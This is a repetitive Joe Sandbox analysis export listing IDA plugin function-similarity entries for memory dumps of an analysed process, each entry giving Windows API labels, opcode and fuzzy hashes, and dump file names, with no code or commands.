        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd
        Similarity
        • API ID: ErrorLast$Value$FreeHeap
        • String ID:
        • API String ID: 365477584-0
        • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
        • Instruction ID: 9e72d4a046e0169157d5891e57defe4355899369649b3479e30c8658fc5b8080
        • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
        • Instruction Fuzzy Hash: 0D118221200378E2F61867B1B81DB6E1245ABA47A0F54B327FD266E7C6CE28E4F14300
        APIs
        Memory Dump Source
        • Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true
        • Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd
        Similarity
        • API ID: ErrorLast$Value$FreeHeap
        • String ID:
        • API String ID: 365477584-0
        • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
        • Instruction ID: eb734aebb5ca11e246d30d2fc613ae7e4b66df255f56628ce00a650d0707b26b
        • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
        • Instruction Fuzzy Hash: BD11302120067CE2F61477B2A81DF6A11519BB57A0F54B727BD6E5E3CACE38D4B18200
        APIs
        Memory Dump Source
        • Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true
        • Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd
        Similarity
        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
        • String ID:
        • API String ID: 517849248-0
        • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
        • Instruction ID: 5c373604d79d419ba86386709485eba59e34204454e8dab459a06c6cd13bd43c
        • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
        • Instruction Fuzzy Hash: 14016D21704B94D6EB10DB52A85CB5963A1FBD8FC0F584236AF8D47794DE3CC5A6CB80
        APIs
        Memory Dump Source
        • Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true
        • Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd
        Similarity
        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
        • String ID:
        • API String ID: 517849248-0
        • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
        • Instruction ID: 930071b39a0231c656bb89b4fe9c2dfd4a05fb2f35cdcc5a5e2cd0b5d6f7c921
        • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
        • Instruction Fuzzy Hash: 14018061700B54D2EB10DB52A89CB9963A1F798FC0F484236EE8D47754DE3DC6E6C780
        APIs
        Memory Dump Source
        • Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true
        • Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd
        Similarity
        • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
        • String ID:
        • API String ID: 449555515-0
        • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
        • Instruction ID: b1190c3988e03ec657cd66d90bb3e6e37034aa0de85ecbc695cdfa923d6b9097
        • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
        • Instruction Fuzzy Hash: 44016175211B58D6FB249BA1F44DB1533A4BBA4B41F141226EE4D0A394EF3DC0B9CB40
        APIs
        Memory Dump Source
        • Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true
        • Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd
        Similarity
        • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
        • String ID:
        • API String ID: 449555515-0
        • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
        • Instruction ID: 47a1ce68920da32055878b979965a78b72bc32af9a8063e92c5c6cbb564246d8
        • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
        • Instruction Fuzzy Hash: C3012D75611758D2FB249BA1E88CB5573A0FB65B45F141226EE8D0A3A4EF3EC1B8C700
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true
        • Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd
        Similarity
        • API ID: FinalHandleNamePathlstrlen
        • String ID: \\?\
        • API String ID: 2719912262-4282027825
        • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
        • Instruction ID: a715ab7b1f4fe9ca9acfde32bfaf718bfbab6e83829d4fbb60ea9b8ee0979815
        • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
        • Instruction Fuzzy Hash: D5F0A462304698E2EB208B60F48CB597360F7A4B88F845122EF494A694DE6CC6F9CB00
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true
        • Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd
        Similarity
        • API ID: FinalHandleNamePathlstrlen
        • String ID: \\?\
        • API String ID: 2719912262-4282027825
        • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
        • Instruction ID: 68e9dade5f0c3ff5586d399fac7513c514027ac90211d51375e5aed64b294aef
        • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
        • Instruction Fuzzy Hash: 16F0A462304698E2E7208B60F588B596360F764B88F845122FE4D4A654DF6DC7F9CB00
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true
        • Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd
        Similarity
        • API ID: AddressFreeHandleLibraryModuleProc
        • String ID: CorExitProcess$mscoree.dll
        • API String ID: 4061214504-1276376045
        • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
        • Instruction ID: 44751e2a88d96281b7c2ee61c5723a867c5011632ae6b1efcd4297db65e00a60
        • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
        • Instruction Fuzzy Hash: D4F09671210A19E5EA109B94A848B595730EBD5760F54231BEE6A4D1F5CF3CD4F8DB00
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true
        • Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd
        Similarity
        • API ID: CombinePath
        • String ID: \\.\pipe\
        • API String ID: 3422762182-91387939
        • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
        • Instruction ID: c3d980f41249f90e54bb462fe4965b79cd909127bd6bcd1665a777ee598deb29
        • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
        • Instruction Fuzzy Hash: A4F08954704BA8D2EA144B93B9185156250BBE8FC0F54A232FE060B755DE2CD4B59B00
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true
        • Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd
        Similarity
        • API ID: AddressFreeHandleLibraryModuleProc
        • String ID: CorExitProcess$mscoree.dll
        • API String ID: 4061214504-1276376045
        • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
        • Instruction ID: 761139f44c4ff2d79f73a82b003a6e6e732419ca125cedb3d9981f408e313687
        • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
        • Instruction Fuzzy Hash: 71F09621210619E1EB109BA49888B591330EB95760F54231BEE694D1E4CF3DC5F8C700
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true
        • Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd
        Similarity
        • API ID: CombinePath
        • String ID: \\.\pipe\
        • API String ID: 3422762182-91387939
        • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
        • Instruction ID: a93b3ea8741a265a44fdd670d50b5f6bf5fd7e7004f2ef75fbb0f3abcd052010
        • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
        • Instruction Fuzzy Hash: EFF08954304BA8D1EE445B93F9185595250F758FC0F44A232FD0A0B714CE2CC5F58700
        APIs
        Memory Dump Source
        • Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true
        • Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd
        Similarity
        • API ID: CurrentThread
        • String ID:
        • API String ID: 2882836952-0
        • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
        • Instruction ID: 6cf4aa5bbb2247c16876fc34b0b99f3c33a18fa81ad892ddc25f2b57033300ad
        • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
        • Instruction Fuzzy Hash: B802CB32219B98D6E760CB55F49875AB7A0F3D4794F101116FA8E9BBA8DF7CC4A4CB00
        APIs
        Memory Dump Source
        • Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true
        • Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd
        Similarity
        • API ID: CurrentThread
        • String ID:
        • API String ID: 2882836952-0
        • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
        • Instruction ID: ad426fab226c1b53a3d60562e30b21cfa8248f2891e77404163c796a205cb20f
        • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
        • Instruction Fuzzy Hash: 7E02E932219B98C6E760CB59F49475AB7A0F3D4794F105116FA8E8BBA8DF7CC4A4CB00
        APIs
        Memory Dump Source
        • Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true
        • Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd
        Similarity
        • API ID: Value
        • String ID:
        • API String ID: 3702945584-0
        • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
        • Instruction ID: 44ffd595d88ff7a75a0bb6ad33afb153ef3502fb8302d1fa1d29ddad59a28496
        • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
        • Instruction Fuzzy Hash: F351C531314624E7E325CB95B448E59B3E4F7A8B80F10521ABE465B798DF38D8B6CB00
        APIs
        Memory Dump Source
        • Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true
        • Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd
        Similarity
        • API ID: Value
        • String ID:
        • API String ID: 3702945584-0
        • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
        • Instruction ID: 2287c7ad7018b87e3b4c79d9bc225223f95fde017d8487c4ab17bffd66a7d6d2
        • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
        • Instruction Fuzzy Hash: 2A51E735314624E7E3A4CB56E848E59B3A0F7A8B80F50521AFE4E4B758DF38C9B5C740
        APIs
        Memory Dump Source
        • Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true
        • Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd
        Similarity
        • API ID: Value
        • String ID:
        • API String ID: 3702945584-0
        • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
        • Instruction ID: 23c1d293e91fa10a61ed833b2e3de4f1129796586c64c71235282e8c018b65fc
        • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
        • Instruction Fuzzy Hash: 14519531324625E7E724CF95B448E1973A4F3A4B80F50521AEE4A5B798DF39D8B6CB00
        APIs
        Memory Dump Source
        • Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true
        • Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd
        Similarity
        • API ID: Value
        • String ID:
        • API String ID: 3702945584-0
        • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
        • Instruction ID: ee777a56378842760daac4657f3471583226edb180d53617f98a4e2ed4c537d3
        • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
        • Instruction Fuzzy Hash: DD51A635224665E7E764CF56A848E1973A0F3A8B80F40521AFE4E47758DF39C9B5CB00
        APIs
        Memory Dump Source
        • Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true
        • Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd
        Similarity
        • API ID: CurrentThread
        • String ID:
        • API String ID: 2882836952-0
        • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
        • Instruction ID: ef7eac4e65b2b9703853e410d6bb15d853af9b1e659d57d48d61be31903dffa4
        • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
        • Instruction Fuzzy Hash: D461DE36128658D6E760CB55F44871AB7A4F398754F102216FE8E9BBE4DB7CC5B0CB04
        APIs
        Memory Dump Source
        • Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true
        • Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd
        Similarity
        • API ID: CurrentThread
        • String ID:
        • API String ID: 2882836952-0
        • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
        • Instruction ID: 3995d7bf18514781843c9ef5b0086f90b18edc85b410a4f92774cd8d7ab136b3
        • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
        • Instruction Fuzzy Hash: 6A61E036129B58D6E760CB95E45871AB7A0F398758F102216FE8D4BBA8DB7CC5B0CF04
        APIs
        Memory Dump Source
        • Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true
        • Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd
        Similarity
        • API ID: CurrentProcessProtectVirtual$HandleModule
        • String ID:
        • API String ID: 1092925422-0
        • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
        • Instruction ID: e171eeba7a317d0870049aa37f67cac7fd15115a9037dbd5f47d60e4adb0a771
        • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
        • Instruction Fuzzy Hash: 77118636604B54E7EB248BA1F40870967B0FB94B80F141227EE4D47794EB7DD5B4C780
        APIs
        Memory Dump Source
        • Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true
        • Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd
        Similarity
        • API ID: CurrentProcessProtectVirtual$HandleModule
        • String ID:
        • API String ID: 1092925422-0
        • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
        • Instruction ID: adea93232bc1b74ea1f2fb2f43593122b4654e1875aa32c7027c20046efe89e4
        • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
        • Instruction Fuzzy Hash: 9E114236605754E3EB248BA1F448A5A67B0FB54B80F041227EE4D0B7A4EB7DC9B4C784
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true
        • Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
